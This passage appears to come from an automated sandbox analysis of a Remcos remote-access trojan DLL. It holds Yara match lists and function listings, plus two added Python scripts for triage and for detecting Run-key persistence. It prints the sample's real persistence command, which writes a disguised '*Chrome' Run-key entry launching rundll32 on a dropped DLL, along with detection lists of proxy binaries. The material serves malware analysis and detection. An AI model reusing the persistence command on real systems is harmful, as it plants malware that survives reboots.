              Source: 00000012.00000002.2229090227.0000000000520000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000012.00000002.2229090227.0000000000520000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000012.00000002.2229090227.0000000000520000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000003.00000002.2209821177.0000000005990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000003.00000002.2209821177.0000000005990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000003.00000002.2209821177.0000000005990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000016.00000002.2595336178.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000016.00000002.2593046305.0000000004240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000016.00000002.2593046305.0000000004240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000016.00000002.2593046305.0000000004240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000000E.00000002.2194973238.0000000002B40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000E.00000002.2194973238.0000000002B40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000E.00000002.2194973238.0000000002B40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000007.00000002.2243597399.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000000.00000002.2245664796.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000011.00000002.2210556963.00000000008F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000011.00000002.2210556963.00000000008F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000011.00000002.2210556963.00000000008F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000005.00000002.2242971963.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000007.00000002.2230248176.0000000004830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000007.00000002.2230248176.0000000004830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000007.00000002.2230248176.0000000004830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000014.00000002.2517552201.0000000003850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000014.00000002.2517552201.0000000003850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000014.00000002.2517552201.0000000003850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000014.00000002.2521295751.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000018.00000002.2511207483.0000000002A40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000018.00000002.2511207483.0000000002A40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000018.00000002.2511207483.0000000002A40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: Process Memory Space: loaddll32.exe PID: 7496, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: regsvr32.exe PID: 7556, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: rundll32.exe PID: 7572, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: rundll32.exe PID: 7580, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: rundll32.exe PID: 7644, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: rundll32.exe PID: 7668, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
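The Yara match list above is long because the same unpacked Remcos image is reported once per memory dump, once per process, and once per unpacked PE. A triage script that collapses it to "which rules hit, in which processes, at which base addresses" is what an analyst wants before reading further. The following is an added example written for this page, not Joe Sandbox code or output; it parses the report's own "Source: ..., type: ... Matched rule: ..." line format (the dump name convention it assumes is process-index.phase.dump-id.base-address) and runs on a handful of lines copied from the report as constructed sample input.

```python
"""Collapse Joe Sandbox Yara match lines into per-process rule sets (added example)."""
import re
from collections import defaultdict

# Constructed sample: lines copied from the report above (the separator between
# the "type" cell and the "Matched rule" cell may or may not be present).
SAMPLE_LINES = [
    "Source: 00000005.00000002.2242971963.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown",
    "Source: 00000007.00000002.2230248176.0000000004830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown",
    "Source: Process Memory Space: rundll32.exe PID: 7572, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown",
    "Source: 17.2.rundll32.exe.8f0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen",
    "Source: 0.2.loaddll32.exe.10ec85b6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa4",
    "Source: 15.2.regsvr32.exe.2a00000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants",
]

LINE_RE = re.compile(
    r"Source:\s*(?P<source>.+?),\s*type:\s*(?P<type>[A-Z]+)\s*\|?\s*"
    r"Matched rule:\s*(?P<rule>\S+)"
)
# Memory dump name: <proc index hex>.<phase>.<dump id>.<base address hex>.<...>.sdmp
DUMP_RE = re.compile(r"^(?P<pidx>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.\d+\.(?P<base>[0-9A-Fa-f]{16})\.")
# Unpacked PE name: <proc index>.<phase>.<image>.<base hex>.<n>[.raw].unpack
UNPACK_RE = re.compile(r"^(?P<pidx>\d+)\.\d+\.(?P<image>.+?\.exe)\.(?P<base>[0-9A-Fa-f]+)\.")
PROCMEM_RE = re.compile(r"^Process Memory Space:\s*(?P<image>\S+)\s+PID:\s*(?P<pid>\d+)")


def parse_match_line(line):
    """Return a record for one match line, or None if it is not a match line."""
    m = LINE_RE.search(line)
    if not m:
        return None
    source = m.group("source")
    rec = {"type": m.group("type"), "rule": m.group("rule"),
           "process": None, "image": None, "base": None, "pid": None}
    if d := DUMP_RE.match(source):
        rec["process"] = int(d["pidx"], 16)
        rec["base"] = int(d["base"], 16)
    elif u := UNPACK_RE.match(source):
        rec["process"] = int(u["pidx"])
        rec["image"] = u["image"]
        rec["base"] = int(u["base"], 16)
    elif p := PROCMEM_RE.match(source):
        rec["image"] = p["image"]
        rec["pid"] = int(p["pid"])
    else:
        return None
    return rec


def rules_by_process(lines):
    """Map each process (sandbox index, or image+PID for string scans) to its rule hits."""
    out = defaultdict(set)
    for rec in filter(None, map(parse_match_line, lines)):
        key = f"{rec['image']} pid={rec['pid']}" if rec["pid"] is not None else f"proc#{rec['process']}"
        out[key].add(rec["rule"])
    return dict(out)


def triage(lines):
    """Reduce the repeated match list to the facts an analyst acts on."""
    recs = [r for r in map(parse_match_line, lines) if r]
    rules = sorted({r["rule"] for r in recs})
    # The same unpacked payload at the same base address reported from several
    # processes is one injected image, not several distinct payloads.
    bases = sorted({r["base"] for r in recs if r["base"] is not None})
    return {
        "rules": rules,
        "family": "Remcos" if any("remcos" in r.lower() for r in rules) else None,
        "uac_bypass_indicator": any("UACBypass" in r for r in rules),
        "payload_bases": [hex(b) for b in bases],
        "processes": sorted(rules_by_process(lines)),
    }


if __name__ == "__main__":
    for k, v in triage(SAMPLE_LINES).items():
        print(f"{k}: {v}")
```

Feeding the whole signature section through `triage()` turns the dozens of lines into one family verdict, the distinct rule names, the set of injected base addresses (0x10EC8000 recurs across processes here because it is the same mapped image) and the list of processes that carried it.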
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B3E2FB
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B2739D
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B5332B
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B1F0FA
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B3E0CC
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B461F0
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B38168
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B54159
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B38770
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B374E6
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B3E558
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B27A46
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B27BAF
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B1DB62
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B378FE
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B4D9C9
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B33946
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B3DE9D
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B26E0E
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B35E5E
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B36FEA
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B13FCA
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B37D33
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A3E2FB
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A2739D
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A5332B
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A1F0FA
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A3E0CC
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A461F0
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A38168
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A54159
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A38770
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A374E6
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A3E558
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A27A46
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A27BAF
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A1DB62
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A378FE
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A4D9C9
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A33946
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A3DE9D
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A26E0E
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A35E5E
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A36FEA
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A13FCA
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A37D33
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 02B34E10 appears 54 times
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 02B34770 appears 41 times
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 02B02093 appears 50 times
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 02B01E65 appears 34 times
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: String function: 02A02093 appears 50 times
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: String function: 02A34E10 appears 54 times
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: String function: 02A34770 appears 41 times
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: String function: 02A01E65 appears 34 times
              Source: 7P7cuKWTfN.dll | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" /t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f
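The reg.exe command line above is the persistence step: a Run-key value whose name impersonates a browser, carries a leading asterisk, and launches rundll32.exe against a DLL dropped in %AppData%. Each of those traits is independently weak, but together they are a reliable detection for commodity RAT persistence of this shape. The following is an added example, not Joe Sandbox or Remcos code: a detection routine that parses `reg add` command lines as they appear in process-creation telemetry and scores them. The Windows-style argument splitter, the list of user-writable directories and the list of proxy binaries are assumptions made for the example; the malicious sample line is the one from the report, and the benign line is constructed.

```python
"""Score 'reg add' command lines for Run-key persistence (added example)."""

RUN_KEYS = ("\\microsoft\\windows\\currentversion\\run",
            "\\microsoft\\windows\\currentversion\\runonce")
# Assumed list of directories an unprivileged user can write to.
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\programdata\\", "\\temp\\")
# Assumed list of signed proxy binaries commonly used to launch a dropped payload.
PROXY_BINS = ("rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe",
              "cscript.exe", "powershell.exe")

# Sample command line copied from the report above.
SAMPLE_MALICIOUS = (r'reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" '
                    r'/t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f')
# Constructed benign line: an installer registering an updater from Program Files.
SAMPLE_BENIGN = (r'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v ExampleUpdater '
                 r'/t REG_SZ /d "C:\Program Files\Example\Updater.exe --quiet" /f')


def win_split(cmdline):
    """Split a Windows command line on whitespace, honouring double quotes.
    Backslashes are literal, which is how reg.exe sees registry paths. A quoted
    chunk glued to unquoted text (…\VIVA_01.dll",EntryPoint) stays one argument,
    as it does for CommandLineToArgvW."""
    args, cur, in_quote, have = [], [], False, False
    for ch in cmdline:
        if ch == '"':
            in_quote, have = not in_quote, True
        elif ch.isspace() and not in_quote:
            if have:
                args.append("".join(cur))
                cur, have = [], False
        else:
            cur.append(ch)
            have = True
    if have:
        args.append("".join(cur))
    return args


def parse_reg_add(cmdline):
    """Return key/value/type/data for a 'reg add' line, or None for anything else."""
    args = win_split(cmdline)
    if len(args) < 3:
        return None
    exe = args[0].lower().rsplit("\\", 1)[-1]
    if exe not in ("reg", "reg.exe") or args[1].lower() != "add":
        return None
    rec = {"key": args[2], "value": None, "type": None, "data": None, "force": False}
    i = 3
    while i < len(args):
        flag = args[i].lower()
        if flag in ("/v", "/t", "/d") and i + 1 < len(args):
            rec[{"/v": "value", "/t": "type", "/d": "data"}[flag]] = args[i + 1]
            i += 2
        else:
            rec["force"] = rec["force"] or flag == "/f"
            i += 1
    return rec


def score_persistence(cmdline):
    """Flag autostart writes that combine more than one commodity-RAT trait."""
    rec = parse_reg_add(cmdline)
    if rec is None:
        return None
    key, data = rec["key"].lower(), (rec["data"] or "").lower()
    reasons = []
    if not key.endswith(RUN_KEYS):
        return {"suspicious": False, "reasons": reasons, "record": rec}
    reasons.append("writes an autostart Run/RunOnce value")
    if rec["value"] and rec["value"].startswith("*"):
        # Microsoft documents the '*' prefix on RunOnce as "run even in Safe Mode";
        # legitimate software almost never sets it.
        reasons.append("value name prefixed with '*'")
    if any(p in data for p in PROXY_BINS):
        reasons.append("payload launched through a proxy binary")
    if any(d in data for d in USER_WRITABLE):
        reasons.append("payload lives in a user-writable directory")
    # Autostart alone is normal; autostart plus any other trait is worth a look.
    return {"suspicious": len(reasons) >= 2, "reasons": reasons, "record": rec}


if __name__ == "__main__":
    for line in (SAMPLE_MALICIOUS, SAMPLE_BENIGN):
        print(score_persistence(line))
```

In production the same scoring applies to the equivalent Sysmon Event ID 13 (registry value set) record, which catches the case where the RAT writes the key through the API instead of spawning reg.exe; the command-line parser here only covers the cmd.exe path this sample took.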
              Source: 17.2.rundll32.exe.8f0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 17.2.rundll32.exe.8f0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 17.2.rundll32.exe.8f0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 6.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 6.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 6.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 22.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 22.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 22.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 22.2.rundll32.exe.4240000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 22.2.rundll32.exe.4240000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 22.2.rundll32.exe.4240000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 6.2.rundll32.exe.5330000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 6.2.rundll32.exe.5330000.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 6.2.rundll32.exe.5330000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 15.2.regsvr32.exe.2a00000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 15.2.regsvr32.exe.2a00000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 15.2.regsvr32.exe.2a00000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0.2.loaddll32.exe.10ec85b6.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.loaddll32.exe.10ec85b6.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.loaddll32.exe.10ec85b6.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 4.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
